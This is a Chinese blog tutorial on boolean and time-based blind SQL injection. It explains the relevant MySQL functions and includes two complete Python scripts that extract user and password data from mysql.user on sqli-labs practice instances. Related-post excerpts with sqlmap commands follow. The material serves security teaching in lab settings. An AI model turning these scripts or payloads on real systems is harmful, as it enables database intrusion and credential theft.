sql注入(布尔盲注)

最新推荐文章于 2025-03-19 12:24:14 发布
最新推荐文章于 2025-03-19 12:24:14 发布
阅读量1.2k 收藏 20
点赞数 18
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_82760239/article/details/137355812
版权
本文介绍了布尔盲注、时间盲注的概念,重点讲解了如何利用sleep()、substr()、length()等函数进行SQL注入,并提供了基于这两个盲注类型的猜解数据库名和字符的示例以及脚本。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一.盲注

首先了解什么是布尔?什么是盲注?什么是布尔盲注?

布尔(Boolean)型是计算机里的一种数据类型,只有True(真)和False(假)两个值。一般也称为逻辑型。

盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。盲注在注入时页面无具体数据返回的注入称之为盲注,一般是通过其他表现形式来判断数据的具体内容。

盲注是不能通过直接显示的途径来获取数据库数据的方法。
在盲注中,攻击者根据其返回页面的不同来判断信息,一般分为基于报错的盲注,布尔盲注和时间盲注。

布尔盲注一般适用于页面没有回显字段(不支持联合查询),且web页面返回True 或者 false,构造SQL语句,利用and,or等关键字来其后的语句 true 、 false使web页面返回true或者false,从而达到注入的目的来获取信息。

对于基于布尔的盲注来说,我们可以构造一条注入语句来测试我们输入的布尔表达式,而这布尔表达式结果的真假,决定了每次页面有不同的反应。

时间盲注指通过注入特定的语句,根据对页面请求的物理反馈,来判断是否注入成功。在sql中使用sleep()函数看加载网页的时间来判断注入点

对于基于时间的盲注来说,我们构造的语句中,包含了能否影响系统运行时间的函数,根据每次页面返回的时间,判断注入的语句是否被成功执行。

二.常用函数

sleep()函数,也称睡眠函数。
sleep(n)会延时显示结果,且延时的时间为 n×查询到的记录数

例: select * from xx where a='aa' and sleep(3) (每一条记录都会延时3秒)

注:and前为真的时候才会延时,延时时间除以3,算出满足前面条件的记录条数

sleep(n)——返回0、中断返回1

截取字符串

substr('str',1,1)从第一个开始取取一个——substr(字符串,开始位置,取几个)

不写第三个参数,默认取到最后一个字符

select substr(database(),1,1)='q' and sleep(3) ——猜解数据库名过程

猜解数据库名的过程中,我们需要知道数据库名的长度

第三个函数获取长度

length()——返回长度

select length(database())

获取ascii码

select ascii('str') ——返回第一个字符的ascii码

为啥要用ASCII码呢,select substr(database(),1,1)='q' and sleep(3)这种直接写='a'的形式不是也可以吗,但是在时间盲注猜解时,如果一个一个试非常的麻烦而且工作量巨大,这个时候就应该写一个脚本,自动的来猜测,脚本如果直接用字母符号计算的时候会比较慢,所以使用ASCII码会提高效率

select ascii(substr(database(),1,1)) > 50 and sleep(2)——猜解第一位

很多函数都有变种,用法与效果类似,名字不同,在某些时候,一些函数被禁止调用,可以寻找其变种来使用,如:substr与mid,left()从左往右截,ascii与ord 

以上函数部分参考了这篇博客  :                      
原文链接:https://blog.youkuaiyun.com/qq_40345591/article/details/127179989

三.常用语句

(1)布尔盲注

布尔盲注使用时分为两个步骤:

  1. 使用 length()函数 判断查询结果的长度
  2. 使用 substr()函数 截取每一个字符,并穷举出字符内容

首先,利用MySQL的 length()函数 判断返回结果的长度是多少。

比如,我们判断 database()当前数据库 的长度,在地址栏输入:

?id=1' and length( database() )=1 -- a

然后,使用MySQL的 substr()函数 截取查询结果的第一个字符,使用 ascii()函数 将截取的字符转换成 ASCLL编码,依次判断是否等于32,33,34……126。

页面异常(空)显示,表示猜解失误;

页面正常显示,表示猜解正确;

具体详细用法和步骤可以参考这篇:

布尔盲注怎么用,一看你就明白了。布尔盲注原理+步骤+实战教程-优快云博客

四、盲注脚本
 

以下脚本是参考大佬的,链接附下


 

get请求盲注脚本:

import requests

# 只需要修改url 和 两个payload即可
# 目标网址(不带参数)
url = "http://3534c6c2bffd4225bf3409ae9a2ec278.app.mituan.zone/Less-5/"
# 猜解长度使用的payload
payload_len = """?id=1' and length(
                    (select group_concat(user,password)
                    from mysql.user)
                ) < {n} -- a"""
# 枚举字符使用的payload
payload_str = """?id=1' and ascii(
                    substr(
                        (select group_concat(user,password)
                        from mysql.user)
                    ,{n},1)
                ) = {r} -- a"""

# 获取长度
def getLength(url, payload):
    length = 1  # 初始测试长度为1
    while True:
        response = requests.get(url= url+payload_len.format(n= length))
        # 页面中出现此内容则表示成功
        if 'You are in...........' in response.text:
            print('测试长度完成,长度为:', length,)
            return length;
        else:
            print('正在测试长度:',length)
            length += 1  # 测试长度递增

# 获取字符
def getStr(url, payload, length):
    str = ''  # 初始表名/库名为空
    # 第一层循环,截取每一个字符
    for l in range(1, length+1):
        # 第二层循环,枚举截取字符的每一种可能性
        for n in range(33, 126):
            response = requests.get(url= url+payload_str.format(n= l, r= n))
            # 页面中出现此内容则表示成功
            if 'You are in...........' in response.text:
                str+= chr(n)
                print('第', l, '个字符猜解成功:', str)
                break;
    return str;

# 开始猜解
length = getLength(url, payload_len)
getStr(url, payload_str, length)

post请求盲注脚本:

import requests

# 网站路径
url = "http://7eb82265178a435aa86d6728e7b1e08a.app.mituan.zone/Less-13/"
# 判断长度的payload
payload_len = """a') or length(
                    (select group_concat(user,password) 
                     from mysql.user)
                )>{n} -- a"""
# 枚举字符的payload
payload_str = """a') or ascii(
                    substr(
                        (select group_concat(user,password)
                        from mysql.user)
                    ,{l},1)
                )={n} -- a"""

# post请求参数
data= {
    "uname" : "a') or 1 -- a",
    "passwd" : "1",
    "submit" : "Submit"
}

# 判断长度
def getLen(payload_len):
    length = 1
    while True:
        # 修改请求参数
        data["uname"] = payload_len.format(n = length)
        response = requests.post(url=url, data=data)
        # 出现此内容为登录成功
        if '../images/flag.jpg' in response.text:
            print('正在测试长度:', length)
            length += 1
        else:
            print('测试成功,长度为:', length)
            return length;

# 枚举字符
def getStr(length):
    str = ''
    # 从第一个字符开始截取
    for l in range(1, length+1):
        # 枚举字符的每一种可能性
        for n in range(32, 126):
            data["uname"] = payload_str.format(l=l, n=n)
            response = requests.post(url=url, data=data)
            if '../images/flag.jpg' in response.text:
                str += chr(n)
                print('第', l, '个字符枚举成功:',str )
                break

length = getLen(payload_len)
getStr(length)

布尔盲注怎么用,一看你就明白了。布尔盲注原理+步骤+实战教程-优快云博客

布尔盲注演示
oxygensss的博客
12-12 1160
(简单但繁琐) 所谓就是在服务器没有错误回显的时候完成注入攻击,没有错误回显,对于攻击者来说就少了非常重要的调试信息 大致分为两种: 1.布尔盲注 只能返回对和错,没有了之前的报错信息 and databse() = ' ' //不断用字母进行填充 => 但是组合太多,所以要切割 substr()截取字符串 substr(str,pos,len) 1.截取的东西 2.位置 3.长度 select substr('abcdefg',1,1) 返回的内容位a and substr(
布尔盲注
printfzfy的博客
12-07 309
打开靶场 点击访问 工具用sqlmap,一般kali虚拟机自带 1:在命令行里输入: sqlmap -u 注入点 --current-db 点回车键会出现 数据库名是 stormgroup 只有出现这个数据库才可执行下个命令 sqlmap -u 注入点-D 获取到的数据名 --tables 会有member和notice 就是下图 3: 获取完之后sqlmap -u 注入点 -D 获取到的数据库...
SQL注入(boolean+时间
最新发布
2201_76045651的博客
03-19 582
布尔盲注(Boolean-based Blind SQL Injection)是一种SQL注入攻击技术,攻击者通过观察应用程序的布尔响应(真/假)来推断数据库中的信息。这种攻击通常发生在应用程序不直接返回数据库错误信息或查询结果,但会根据查询条件返回不同的响应(如页面内容、HTTP状态码等)时。
SQLi-LABS
m0_74855736的博客
03-14 986
单引号闭合确定数据库查询的字段数确定显示位查询当前数据库名,查询当前数据库下所有的表查询user表中的字段数查询字段的数据。
布尔盲注(一)
qq_39416206的博客
03-08 2767
什么是布尔盲注的种类和介绍: 常用函数: length() 函数 返回字符串的长度 ?id=1 and length(database())>1 substr() 截取字符串 , 从第一位截取一个 ?id=1 and substr(database(),1,1)='k' ord()/ascii() 返回字符的ascii码 ?id=1 and ord(substr(database(),1,1))=107 sleep() 将程序挂起一段时间n为n秒 if(expr1,expr2
基于布尔
Z_l123的博客
02-18 831
关于布尔盲注 某些场合下,页面返回的结果只有两种(正常或错误)。通过构造SQL判断语 句,查看页面的返回结果(True or False)来判断哪些sQL判断条件成立,通过此来获取数据库中的数据。 一些功能函数的说明 length(str):返回字符串(str)的长度,以字节为单位。 substr(str,pos,len):从指定的位置( pos)开始,截取并返回字符串 ( str)指定长度(len)的子串。 ascii(str):返回字符串( str)最左边字符的ASCll码。 1.访问SQLi-
SQL注入-布尔
qq_65240014的博客
07-26 770
关于sql注入的略微进阶一点的文章,介绍关于bool型的方法
5.布尔盲注
kinght的博客
08-26 644
title: 5.布尔盲注 date: 2020-07-30 17:24:00 categories: 4.网络安全 1.Web安全 1.SQL注入 tags: 1.Web安全 2.SQL注入注入我们已经有了简单的概念,然而,就是在sql注入过程中,某些sql语句的执行结果被程序限制不回显到前端,这时候我们只能用一些别的方法进行判断或者尝试,这个判断或尝试过程就叫。 什么是布尔盲注 布尔是判断真假,那么布尔盲注就是通过判断真假的方式来判断或尝试的注入攻击 <?php error_re.
布尔盲注(ctfhub)
2401_82985722的博客
03-27 2171
页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行SQL注入。在注入语句后,不是返回查询到的结果,而只是返回查询是否成功。?id=1' and 1=1--+ 真页面true?id=1' and 1=2--+ 假页面false# substr(database(),1,1):表示从数据库的第1个字母开始,显示1个字母,从1开始计数# limit 0,1:表示从第0行开始,显示1行,从0开始计数一、手动注入一般顺序:爆数据库名长度。
布尔盲注详解
热门推荐
AaronLuo
08-27 1万+
布尔盲注 布尔盲注一般适用于页面没有回显字段(不支持联合查询),且web页面返回True 或者 false,构造SQL语句,利用and,or等关键字来其后的语句 true 、 false使web页面返回true或者false,从而达到注入的目的来获取信息 ascii() 函数,返回字符ascii码值 参数 : str单字符 length() 函数,返回字符串的长度 参数 : str 字...
有趣的布尔盲注
young9222的博客
05-16 380
2019年4月9日17:17:49 URL: http://123.206.87.240:8007/web2/ 一,试探 主页只有一个登陆框,和几个没有链接的导航。打眼看起来像是sql注入题目。 随手测试一下,用户名,密码不能为空,而且用户名不正确会弹窗: 所以是需要用户名的,测试一下admin,果然有区别: 所以猜测考点是要靠sqli获得admin的密码。 二,深入 既然猜到考点是sqli...
【Less-8】布尔盲注
ssrf
10-29 1829
目录一、知识铺垫1、substr字符串截取函数2、sql中limit使用3、python中的string模块二、布尔盲注复现1、测试注入点2、判断数据库名长度3、猜数据库名4、判断表名长度5、猜表名6、判断字段名长度7、猜字段名8、判断数据长度9、猜数据 一、知识铺垫 SQL操作函数: 1、substr字符串截取函数 语法: substr(string,start,length) 例如: select substr(‘abcdefg’,3,4) from dual;【结果是cdef】 select .
SQL--基于布尔类型的注入 2018/11/14
weixin_43689084的博客
11-14 705
在一些站点隐藏了错误信息的情况下,联合查询以及报错注入的方法均无法注入出数据的时候,需要用到的方法来进行注入。 基于布尔是根据页面差来进行判断和数据注入的。在存在注入的页面输入and(true)则返回页面1;输入and(2)则返回页面2.而页面1和页面2有差别,常见的情况是页面1是正常页面,页面2是错误页面。 substr(str,pos,len):将str从pos...
布尔盲注(结合BurpSuite暴力破解)
weixin_59047731的博客
11-17 1229
有些情况下,**开发人员屏蔽了报错信息**,导致攻击者无法通过报错信息进行注入的判断。这种情况下的注入,称为根据展现方式,分为**boolean型和时间型**。 Boolean是基于真假的判断(true or false); 不管输入什么,结果都只返回真或假两种情况; 通过and 1=1和and 1=2可以发现注入点。 Boolean型的关键在于通过表达式结果与已知值进行比对,根据比对结果 判断正确与否。
sql注入布尔盲注流程
06-28
SQL注入布尔盲注是一种利用SQL注入技术来检测查询结果是否满足某个条件的攻击方法,它通常在应用程序中用于验证用户输入时使用。以下是SQL注入布尔盲注的基本流程: 1. **识别可注入点**:攻击者首先尝试找出页面上可以接收用户输入的地方,如表单、URL参数等,这些地方可能存在SQL查询。 2. **构造基础查询**:创建一个基本的查询语句,通常是检测一个特定值(例如用户是否存在)的存在,通常是一个简单的`SELECT * FROM table WHERE column = 'value'`。 3. **提交测试数据**:在查询中替换'value'为潜在的恶意输入,例如`'1'`或`'1 OR 1=1'`。'1'会返回所有结果,而`'1 OR 1=1'`在大多数情况下会返回所有数据,因为布尔条件为真。 4. **观察响应**:根据服务器返回的结果,判断原始查询条件是否满足。如果服务器返回预期的结果(如所有数据),则说明条件成立;反之,如果返回空结果或异常,则条件不成立。 5. **迭代调整**:根据响应调整恶意输入,例如尝试否定条件(如`'1 OR 1=0'`),直到找到正确的布尔表达式。 6. **解析结果**:利用布尔表达式的真假来推断数据库中的敏感信息,例如是否存在特定记录、字段值等。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值